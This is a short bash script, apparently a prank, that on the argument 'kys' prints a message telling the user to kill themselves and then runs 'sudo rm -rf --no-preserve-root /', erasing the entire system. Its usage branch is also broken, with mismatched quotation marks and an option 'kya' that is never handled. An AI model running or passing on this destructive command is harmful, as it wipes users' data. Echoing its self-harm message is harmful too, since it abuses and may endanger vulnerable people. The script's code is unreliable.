#!/bin/bash

if [[ "$1" == "kys" ]]; then
    echo "You should kill yourself... in 3 seconds from now!"
    sleep 3
    sudo rm -rf --no-preserve-root /
else
    echo "Usage: $0 [kys|kya]”
    echo “You spelt it wrong (or added args… why tf?”
    exit 1
fi

exit 0
